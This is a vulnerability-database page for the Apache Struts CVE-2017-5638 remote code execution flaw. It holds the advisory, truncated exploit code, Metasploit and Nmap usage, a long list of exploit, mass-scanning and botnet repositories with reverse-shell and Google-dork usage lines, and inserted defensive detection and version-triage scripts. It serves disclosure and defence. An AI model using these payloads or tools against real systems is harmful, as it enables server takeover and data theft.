CVE-2017-5638

Published: 11/03/2017 Updated: 04/03/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
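The summary above describes the bug as an error-handling path: Struts hands any Content-Type containing "multipart/form-data" to the Jakarta parser, and when the parser rejects the header its text is copied into an error message that is then evaluated as OGNL. As an added example (not code from this page or from any of the projects it lists), the following Python classifies captured requests against that path and, going one step further than the summary, against the Content-Disposition filename variant (S2-046) that appears later in the repository list. The sample requests are constructed for the demo, and the strict multipart grammar and the marker list are this example's own design choices, not a published rule.

```python
# Added example (not from the page or any project it lists): flag requests that
# follow the CVE-2017-5638 error path. Sample requests below are constructed.
import re

# A legitimate upload sends "multipart/form-data" plus ;name=value parameters
# (RFC 7231 tokens or quoted strings). Anything else that still contains the
# multipart string is what the Jakarta parser rejects, and that rejection is the
# step that feeds the raw header into an OGNL-evaluated error message.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_PARAM = rf'\s*;\s*{_TOKEN}\s*=\s*(?:{_TOKEN}|"[^"]*")'
_STRICT_MULTIPART = re.compile(rf"^multipart/form-data(?:{_PARAM})*\s*;?\s*$", re.I)

# Substrings seen in S2-045 payloads (the page's own summary cites "#cmd=");
# none of them occurs in a valid media type or a sane filename.
_OGNL_MARKERS = ("%{", "${", "#_memberaccess", "#cmd=", "@ognl.", "#context")

_FILENAME_RE = re.compile(rb'filename="([^"]*)"', re.I)


def content_type_findings(value):
    """S2-045: Struts routes any Content-Type containing 'multipart/form-data'
    to the Jakarta parser; a malformed one ends up in the error message."""
    v = value or ""
    low = v.lower()
    out = []
    if any(m in low for m in _OGNL_MARKERS):
        out.append("S2-045: OGNL marker in Content-Type")
    if "multipart/form-data" in low and not _STRICT_MULTIPART.match(v):
        out.append("S2-045: malformed multipart Content-Type")
    return out


def content_disposition_findings(body):
    """S2-046 variant: a null byte in a part's filename raises
    InvalidFileNameException with the filename echoed into the message,
    which takes the same OGNL-evaluated error path."""
    out = []
    for m in _FILENAME_RE.finditer(body or b""):
        name = m.group(1)
        if b"\x00" in name:
            out.append("S2-046: null byte in multipart filename")
        if any(mk.encode() in name.lower() for mk in _OGNL_MARKERS):
            out.append("S2-046: OGNL marker in multipart filename")
    return out


def classify(request):
    """request = {"headers": {...}, "body": bytes}; returns a list of findings."""
    headers = {k.lower(): v for k, v in request["headers"].items()}
    return (content_type_findings(headers.get("content-type"))
            + content_disposition_findings(request.get("body", b"")))


# Constructed sample traffic: one clean upload, one clean form post, and
# shortened stand-ins for the two attack shapes (not working exploits).
BOUNDARY = b"----demo1234"
SAMPLE_REQUESTS = {
    "benign_upload": {
        "headers": {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY.decode()},
        "body": (b"--" + BOUNDARY + b"\r\n"
                 b'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
                 b"Content-Type: application/pdf\r\n\r\n%PDF-1.4\r\n"
                 b"--" + BOUNDARY + b"--\r\n"),
    },
    "plain_form": {
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "body": b"a=1",
    },
    "s2_045": {
        "headers": {"Content-Type":
                    "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id')}"},
        "body": b"",
    },
    "s2_046": {
        "headers": {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY.decode()},
        "body": (b"--" + BOUNDARY + b"\r\n"
                 b'Content-Disposition: form-data; name="file"; filename="%{#cmd=\'id\'}\x00b"\r\n'
                 b"\r\nx\r\n"
                 b"--" + BOUNDARY + b"--\r\n"),
    },
}


def scan(requests=SAMPLE_REQUESTS):
    """Return {name: findings} for each request that trips at least one rule."""
    hits = {}
    for name, req in requests.items():
        findings = classify(req)
        if findings:
            hits[name] = findings
    return hits


if __name__ == "__main__":
    for name, findings in scan().items():
        print(name, findings)
```

The strict grammar deliberately rejects boundary values that are neither tokens nor quoted strings, so a proxy rule built on it may need the quoted form allowed for unusual clients; the marker list is a second, independent signal so that an evasion that keeps the header syntactically valid still has to avoid every OGNL spelling.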

Affected Products

Vendor: Apache
Product: Struts
Versions: 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.1, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.5, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10

Vendor Advisories

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts 2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value. This vulnerability has been assigned CVE-ID CVE-2017-5638. This advisory is availabl ...
A flaw was reported in Apache Struts 2 that could allow an attacker to perform remote code execution with a malicious Content-Type value ...
Remote code execution vulnerability via Apache Struts 2. Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product ...

Exploits

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib

def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.Action ...

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update ...

Mailing Lists

Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell ...

Nmap Scripts

http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2017-5638:
|   VULNERABLE
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|     Disclosure date: 2017-03-07
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|       https://cwiki.apache.org/confluence/display/WW/S2-045
|_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Metasploit Modules

Apache Struts Jakarta Multipart Parser OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts versions 2.3.5 - 2.3.31 and 2.5 - 2.5.10. Remote code execution can be performed via the HTTP Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
      msf exploit(struts2_content_type_ognl) > show targets
            ...targets...
      msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
      msf exploit(struts2_content_type_ognl) > show options
            ...show and set options...
      msf exploit(struts2_content_type_ognl) > exploit

Github Repositories

cve-2017-5638: Vulnerable site sample. This project aims to demonstrate CVE-2017-5638 exploitation for educational purposes. For more information, see cwiki.apache.org/confluence/display/WW/S2-045. Legal Disclaimer: This project is made for educational and ethical testing purposes only. Attacking targets without prior mutual consent is illegal. It is the e ...

apache-struts2-CVE-2017-5638: Demo application and exploit. Sample Apache Struts2 app: Struts2-showcase, mvnrepository.com/artifact/org.apache.struts/struts2-showcase/2.3.12. Exploit reference: github.com/rapid7/metasploit-framework/issues/8064

CVE-2017-5638 (PoC Exploits)

cve-2017-5638: Reference_1, Reference_2, Reference_3, Reference_4

CVE-2017-5638 | Struts S2-045. Description: It is possible to perform an RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid, an exception is thrown which is then used to display an error message to a user. Affected versions: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10. Exploitation. Remediation: To remediate this issue, update the affec ...

CVE-2017-5638: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script. The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Ty ...

Modded-Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638-AUTO-EXPLOITER

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

struts-rce-cve-2017-5638: Struts-RCE CVE-2017-5638. This is a modified exploit that creates a webshell and provides a bash/cmd-like interface to interact with the webshell in the console.

Struts-Apache-ExploitPack: These are just some scripts which you can use to detect and exploit the Apache Struts vulnerability (CVE-2017-5638). There is a MassScanner and an Exploiter; you can use the scanner to mass-scan a list of URLs and then exploit them with the Exploiter. The Exploiter will run arbitrary shell commands on the vulnerable server.

POC Exploit for CVE-2017-5638. Only use this exploit on systems you own or have explicit rights to test. Installation: If you already have Go installed on your computer, go get is the way to go: go get github.com/Greynad/struts2-jakarta-inject. Usage: Single command execution: struts2-jakarta-inject -u <url> -c 'id'. Pseudo-interactive shell: struts2-jakarta-inje ...

CVE-2017-5638: struts.apache.org/docs/s2-016.html, cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017 ... Metasploit Framework exploit module for the Apache Struts Content-Type exploit. Have not tested against a Windows server, but tested against a Linux server using the payload generic/shell_bind_tcp.

StrutsShell: Apache Struts (CVE-2017-5638) Shell. Introduction: The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective Metasploit module for this vulnerability did not w ...

Apache-Struts: An exploit for Apache Struts CVE-2017-5638. Usage: Testing a single URL: python struts-pwn.py --url 'example.com/struts2-showcase/index.action' -c 'id'. Nmap recon: nmap -p <port> --script http-vuln-cve2017-5638 <target>. Testing a list of URLs: python struts-pwn.py --list 'urls.txt' -c 'id' ...

struts-pwn: An exploit for Apache Struts CVE-2017-5638. Usage: Testing a single URL: python struts-pwn.py --url 'example.com/struts2-showcase/index.action' -c 'id'. Testing a list of URLs: python struts-pwn.py --list 'urls.txt' -c 'id'. Checking if the vulnerability exists against a single URL: python struts-pwn.py --check --url 'h ...

strutser: This program checks for CVE-2017-5638. Usage of ./strutser: -c, --concurrency int (concurrent HTTP requests, default 10); -f, --file string (file containing targets); -p, --ports intSlice (ports to check, default [80]); -t, --timeout int (timeout on HTTP requests, default 15). Tips: For multiple ports, use the --ports argum ...

cve-2017-5638

CVE-2017-5638 Apache Struts2 Example PoC Exploit: PHP code for CVE-2017-5638. Usage: php exploit.php "127.0.0.1:8080/example/index.action" "command". ** USE AT YOUR OWN RISK **

remote-code-execution-sample: Example shows how to use the Java Security Manager to prevent remote code execution exploits. Intro to the Problem. The Problem: Equifax breach, 143 million Americans' personal info, including names, addresses, dates of birth and SSNs, compromised. Only a veneer of security was in place. The Exploit: The vulnerability: Apache Struts, CVE-2017 ...

S2-045: Struts2 S2-045 vulnerability environment

CVE-2017-5638 PoC Code in Python | DORK: ext:action. Example PoC code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action. USAGE: python struts.py victimsite dir. The initial Python script that was posted didn't correctly format the Content-Type header. I recoded the Content-Type header to properly format Content-Type:%20{Exploit}. I also added a logging and ...

Apache Struts2 Vulnerability | CVE-2017-5638 | Version 2.5. Disclaimer: This is meant for educational and research purposes only. I do not authorize or endorse any illegal or unethical use of this project's contents or information. Instructions: To run the webapp: java -jar ms-cybersecurity-1.jar (uses embedded Tomcat, Java 1.8). The webapp boots on port 8080 by default (loca ...

S2-045 RCE. Usage: python CVE-2017-5638-S2-045.py url. The script only does command execution; a while loop provides an interactive way to run commands repeatedly.

S2-045 CVE-2017-5638 Exploit. Remediation: Detection method: look under the web directory in /WEB-INF/lib/ for struts-core-x.x.jar; if that version is between Struts 2.3.5 and Struts 2.3.31, or between Struts 2.5 and Struts 2.5.10, the vulnerability is present. Update to Struts 2.3.32 or Struts 2.5.10.1, or protect the application with a third-party protection device.
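The jar-version check described in the entry above is the quickest host-side triage for this CVE, and it is easy to get wrong at the branch edges (2.5.10 is vulnerable, 2.5.10.1 is not). As an added example (not code from this page or from any project it lists), the following Python walks a deployment tree, picks out Struts core jars by filename, and compares each version against the fixed releases the summary names, 2.3.32 and 2.5.10.1. It follows the CVE summary's ranges (any 2.3.x before 2.3.32, any 2.5.x before 2.5.10.1), so older 2.3.x builds are reported as vulnerable too; the sample paths are constructed.

```python
# Added example (not from the page or any project it lists): triage
# struts2-core jars by version against the fixed releases named above.
import os
import re

# Fixed releases per branch, from the advisory: 2.3.32 and 2.5.10.1.
FIXED_IN = {(2, 3): (2, 3, 32), (2, 5): (2, 5, 10, 1)}

# Matches struts2-core-2.3.31.jar, struts-core-1.3.10.jar, etc.
_JAR_RE = re.compile(r"struts2?-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); tuples compare correctly, so 2.5.10 < 2.5.10.1."""
    return tuple(int(p) for p in text.split("."))


def assess(version):
    """'vulnerable' / 'fixed' for the 2.3.x and 2.5.x branches the CVE covers,
    'unassessed' for anything else (Struts 1, or a 2.x branch not in the advisory)."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        return "unassessed"
    return "vulnerable" if v < fixed else "fixed"


def triage_jars(paths):
    """Map each Struts core jar path to (version, status); other jars are skipped."""
    out = {}
    for path in paths:
        m = _JAR_RE.search(os.path.basename(path))
        if m:
            out[path] = (m.group(1), assess(m.group(1)))
    return out


def find_struts_jars(root):
    """Walk a deployment tree (e.g. Tomcat's webapps) and collect candidate jars."""
    found = []
    for dirpath, _, files in os.walk(root):
        found += [os.path.join(dirpath, f) for f in files if _JAR_RE.search(f)]
    return found


# Constructed sample of what a webapps/ tree might contain.
SAMPLE_PATHS = [
    "webapps/app1/WEB-INF/lib/struts2-core-2.3.31.jar",
    "webapps/app2/WEB-INF/lib/struts2-core-2.5.10.jar",
    "webapps/app3/WEB-INF/lib/struts2-core-2.5.10.1.jar",
    "webapps/app4/WEB-INF/lib/struts2-core-2.3.32.jar",
    "webapps/app5/WEB-INF/lib/struts2-core-2.3.4.1.jar",
    "webapps/legacy/WEB-INF/lib/struts-core-1.3.10.jar",
    "webapps/app1/WEB-INF/lib/commons-fileupload-1.3.2.jar",
]

if __name__ == "__main__":
    # On a real host: triage_jars(find_struts_jars("/opt/tomcat/webapps"))
    for path, (ver, status) in triage_jars(SAMPLE_PATHS).items():
        print(f"{status:11} {ver:9} {path}")
```

A filename check only sees jars that are on disk under their original names; a shaded or renamed bundle, or a Struts copy inside an uber-jar, needs a check of the MANIFEST or the class files, which is why the check_struts entry further down also looks at what is loaded on the system.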

ExpStruts: ExpStruts is a PHP-based mass exploiter for CVE-2017-5638. Screenshot(s). Requirements: Python3 for MakMan's Google Scraper. Abk Khan [ @asystolik ]

struts2_cve-2017-5638: This is a sort of Java port of the Python exploit at www.exploit-db.com/exploits/41570/. This software is written to have no external dependencies. DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which anyone uses thi ...

Tool to exploit security bug CVE-2017-5638. Install dependencies: easy_install requests; easy_install termcolor. Contact: reach me at @saamux with any question or suggestion.

Common-Vulnerability-and-Exploit-5638: This is the Apache Struts CVE-2017-5638 Struts 2 vulnerability, the same CVE that resulted in the Equifax database breach. A write-up on how to apply, and patch against, this exploit.

Stutsfi: An exploit for CVE-2017-5638, a Remote Code Execution (RCE) vulnerability in Apache Struts 2.

Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638 (Struts2 Security Bulletin S2-046). A null byte (\x00) in a request's Content-Disposition header filename field can trigger an InvalidFileNameException with the same (client-controlled) filename string in the exception message, which can be used to trigger OGNL evaluation during error handling. Note tha ...

CVE-2017-5638: CVE-2017-5638 in different formats. Most of them will require you to enter the URL, and you might want to change the command. Please issue pull requests if you can make it so you can enter a URL and command! PHP - Example: localhost/2017-5638.php?url=TARGET&cmd=command. XMLHttpRequest - CVE-2017-5638.js -- will require Access-Control-Allow-Origin on tar ...

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X: test the Struts2 vulnerability CVE-2017-5638 on Mac OS X. Download the test web app and run it in Tomcat: install Tomcat: brew install tomcat; confirm where Tomcat is installed: ls -lF `which catalina`; confirm the Tomcat home dir: ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec; create the web app "struts2" in Tomcat's webapps ...

OgnlContentTypeRejectorValva: This is a Valve for Tomcat 7 to block the Struts 2 Remote Code Execution vulnerability (CVE-2017-5638).

Apache Struts CVE-2017-5638 exploitation: This simple web application is built with vulnerable Apache Struts 2.5.10 (CVE-2017-5638). It's vulnerable to RCE. Starting the web application: To start the vulnerable web application, execute: mvn jetty:run. The application will be accessible on port 8012 by default. You can change it: mvn -Djetty.http.port=<port ...

apache-struts-v2-CVE-2017-5638: Working POC for CVE-2017-5638. This repo contains a working Python example demonstrating the RCE capabilities of CVE-2017-5638. Also included for reference is the Struts Showcase WAR file.

Struts2Shell: An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug. Installation: $ npm install -g struts2shell. Installation as a library: $ npm install struts2shell. Command line options: -h, --help (output usage information); -V, --version (output the version number); -u, --url [target] (URL to attack); -c, --cmd [command] (command to execute). Usage as li ...

CVE-2017-5638: Google Dork: "site:com filetype:action"

Strutsy: Mass exploitation of the Apache Struts (CVE-2017-5638) vulnerability. Includes blind and time-based code injection techniques, which significantly reduce false negatives. Other features include mass URL imports to scan multiple targets in one go. Usage: python strutsy.py urls.txt windows/linux/default ip-address. All parameters are required. urls.txt - file contai ...

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still a minuscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, the vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blo ...

Apache-Struts-2-CVE-2017-5638-Exploit: This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the Apache server. How to use: $ sudo python Struts2_Shell001.py (prints the banner "[!] Exploit Apache Struts2 {*}DEMO").

CVE-2017-5638

cve-2017-5638: Demo app of THAT data broker's security breach.

Struts2 S2-045 (CVE-2017-5638) Exp Tools. Exp functions: command execution; get the target website's physical path; file upload; getshell; default webshell for Chopper; HTTP/HTTPS support; URLs with any port supported. Note: the default webshell's password is s2045@exp. Notice: the project is intended for educational/research purposes. Mail: flyteas@gmail.com

CVE-2017-5638 Apache Struts 2.0 RCE vulnerability: This is a script to exploit CVE-2017-5638. It allows an attacker to inject OS commands into a web application through the Content-Type header. Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model- ...

strutszeiro: Telegram bot to manage botnets created with the Struts vulnerability (CVE-2017-5638). Dependencies: pip install -r requeriments.txt. Config: Create a Telegram bot and save the API token in config/token.conf. Create a Telegram group and save the group id in config/group.conf. Start: python strutszeiro.py. Telegram usage: /add url - test vulnerability and add the new server; /exploit ...

Exploit Demo for CVE-2017-5638: Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Usage: Prerequisites: have Python, Docker, Maven and a JDK installed. Clone this repo; run mvn clean package in the project root; run docker build -t hack .; run docker run -d -p 8080:8080 hack. Once the container comes online, verify by running in the browser. To begin testing RCE ...

CVE-2017-5638: This script is intended to validate the Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock. This is completely harmless, as it does not inject any malicious payload; it only injects an HTTP header named 'STRUTS2-VALIDATION' in order to be able to validate whether the target is vulnerable. Because of its multithread capability, it's able to run 25k+ appli ...

CNVD-ID: CNVD-2017-02474. Published: 2017-03-07. Severity: High (AV:N/AC:L/Au:N/C:C/I:C/A:C). Affected products: Apache Struts >=2.3.5, <=2.3.31; Apache Struts >=2.5, <=2.5.10. CVE ID: CVE-2017-5638. Description: Apache Struts is an open-source framework for building enterprise-grade Java web applications. Apache Struts2 has the S2-045 remote code execution vulnerability. A remote attacker ...

CVE-2017-5638. Table of Contents: Overview, Dependencies, Usage. Overview: This project is a proof-of-concept for the Apache Struts vulnerability. The goal was to create software that can generate and test random IPs for the vulnerability described above. Use this project at your own risk and for educational purposes only. Dependencies: cURL. cURL is used to send the crafted header t ...

S2-046_POC. Usage: ./s2_046.sh [url]; ./s2_045.sh [url]. Sample: chmod +x ./s2_046.sh; ./s2_046.sh 172.16.152.135/index.action. OUTPUT: ================HTTP GET Method================ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_j ...

Vulnerable Struts2 application. Requirements: Maven (maven.apache.org), Struts <= 2.5.10. CVE-2017-5638 - Apache Struts 2 multipart form RCE. Requirements: Locate a URL that issues a multipart form POST. Getting started: The application / server can be started with the following Maven command: mvn jetty:run. Run the exploit (www.exploit-db.com/exploits/41570 ...

CVEPoC's: List of software CVEs with some "testing code" alongside a "testable" real web app implementing these vulnerabilities. Command Injections: C 1. CVE-2016-3714 ==> ImageTragick RCE. Argument Injections: PHP 1. CVE-2016-10033 ==> PHPMailer + WordPress 4.6 RCE. Code Injections: JAVA 1. S2-046_CVE-2017-5638 ==> Stru ...

cve-testing

S2-Reaper: This project is used to collect vulnerable URLs affected by Struts2 S2-045 from Google search results. Usage: python reaper.py. About: reaper.py runs a Google search crawler with keywords defined in crawler.conf to find vulnerable URLs. crawler.conf: base_url: the basic Google search URL; keyword: e.g. site:gov ext:action; expect_num: expected search res ...

Overview: Git repository for a grey hat hacking talk. Agenda: What is a hacker; What is grey hat hacking; Why is it important (survey of Fortune 500 companies); Talk about the Equifax hack (link); Run the Equifax hack; Show them the code; Walk through what it does; Run the exploit against a server; Show the results; Decode the passwords; Talk about how it was executed and the fallout for Equifax.

Strutshock. Usage: strutshock example.com/index.action

Struts2-045-Exp: Struts2-045 exploit script, for testing only. Usage: python3 struts2-045-exp.py url cmd

A Vulnerable Apache Struts Application. Confirmed vulnerabilities: CVE-2017-5638 - Remote Command Vulnerability in Apache Struts - cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638. Requirements: Vagrant, VirtualBox, SearchSploit (optional). Setup: $ git clone github.com/evolvesecurity/vuln-struts2-vm.git; $ cd vuln-struts2-vm; Build Virtual M ...

CVE-2017-5638 Apache Struts 2 Vulnerability: Remote Code Execution, reverse shell from target. Author: anarc0der - github.com/anarcoder. Tested with tomcat8. Install tomcat8 and deploy the WAR file from github.com/nixawk/labs/tree/master/CVE-2017-5638. Example: Open: $ nc -lnvp 4444; python2 struntsrce.py --target=localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 -- ...

DevSecOps Pipeline Demo. Requirements: This demo uses VirtualBox to deploy a local GitLab instance and configure it to run a DevSecOps pipeline demo. It demonstrates a DevSecOps pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach. Prerequisites: VirtualBox, Vagrant, Python. You will also need the Vagrant Host ...

check_struts: This project was created following the 2017 Equifax exploit. The check_struts.sh script aims at retrieving the version and location of any Apache Struts libraries found and/or loaded on the system. It can be run directly on a server, or with the provided Ansible playbook to handle several servers. Possible outputs: "Libs path and versions loaded on the system: ...

Kubernetes security presentation: This repository contains manifest files for a presentation about Kubernetes security held at a meetup of the "München Kubernetes/Cloud-Native Meetup" group. To deploy the sample application: kustomize build sample-app/base | kubectl apply -f -. To deploy the sample application with a security context in place: ...

Commandline Emulator | CVE-2017-5638. Disclaimer: This is meant for educational and research purposes only. I do not authorize or endorse any illegal or unethical use of this project's contents or information. Proof-of-concept command line emulator to deliver payloads for CVE-2017-5638. Instructions: Run: java -jar Send.jar. Url: localhost/Webapp/action. Supports most ba ...

StrutsExp. Usage: strutsexp example.com/index.action

CVE-shellshock: Common Vulnerabilities and Exposures. Big CVEs in the last 5 years: CVE-2014-0160 - Heartbleed. The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication se ...

Apache-Struts-v3: Script combining 3 RCE-type vulnerabilities in Apache Struts; it can also create a shell on the server. SHELL: php - function finished :); jsp - function in development. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect: ...

Penetration Testing Methodology: Penetration testing process, methods and real-world attack collections. Framework and Testing Guide: OWASP - Open Web Application Security Project; PTES - Penetration Testing Execution Standard; PCI DSS - PCI Penetration Testing Guide; PTF - Penetration Testing Framework; OSSTMM - Open Source Security Testing Methodology Manual. Pre-Engagement: VMware ...

CVE-2018-11776-Python-PoC: hook-s3c (github.com/hook-s3c), @hook_s3c on Twitter. Working Python test and PoC for CVE-2018-11776, originally appearing on github.com/hook-s3c/CVE-2018-11776-Python-PoC. What's going on? Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request. Versions affected are 2 ...

JexBoss - JBoss (and other Java Deserialization Vulnerabilities) verify and EXploitation Tool. JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks, applications, etc. Requirements: Python >= 2.7.x, urllib3, ipaddress. Installation on Linux/Mac: To install the latest version of JexBoss, please use the ...

FwdSh3ll: FwdSh3ll is a tiny open-source, web-payload-oriented exploitation framework for crafting forward shells with a Metasploit-like usage experience. What is a forward shell? Have you ever been caught in a situation when, looking for an approach to a CTF box, you discover an RCE vulnerability in a web app but despite that you can't get a reverse shell no matter how har ...

Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve it with your payloads and techniques! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains: README.md - vulnerability description and how to exploit it; Intruders - a set of files to give to Burp Intrude ...

cve-2014-0050: CVE-2014-0050 Vulnerable site sample. This project aims to demonstrate CVE-2014-0050 exploitation for educational purposes. For more information, see: www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/ and github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache ...

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. DEMO VIDEO. FEATURES: Automatically collects basic recon (i.e. whois, ping, DNS, etc.); Automatically launches Google hacking queries against a target domain; Automatically enumerates open ports via Nmap port scanning; Automatically brute forces sub-doma ...

Environment: Requires Java 1.8+ and Maven 3.x+. Usage: 1. Download: git clone git.oschina.net/0d/Struts2_bugs.git 2. View remote branches: git branch -a 3. Switch to a branch: git checkout <branch-name>, e.g. git checkout S2-046 4. Package: mvn clean package 5. Deploy in Tomcat: copy the Struts2-046.war generated in \target into Tomcat's webapps directory, then start Tomcat and visit 127.0.0 ...

ABOUT: Kn0ck is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. KN0CK FEATURES: Automatically collects basic recon; Automatically launches Google hacking queries against a target domain; Automatically enumerates open ports via Nmap port scanning; Automatically brute forces sub-domains, gathers DNS info and checks f ...

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting add-on for professional penetration testers, bug bounty researchers and corporate security teams to manage large environments and pentest scopes. For more information regarding ...

ActiveScan++: ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding); Edge Side Includes; XML input handling; suspicious input transformation (e.g. ...

Recent Articles

Panda Threat Group Mines for Monero With Updated Payload, Targets
Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Equifax to Pay $700 Million in 2017 Data Breach Settlement
Threatpost • Lindsey O'Donnell • 22 Jul 2019

Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.
The consumer credit reporting agency on Monday said it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S., and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover ...

EternalBlue Exploit Serves Beapy Cryptojacking Campaign
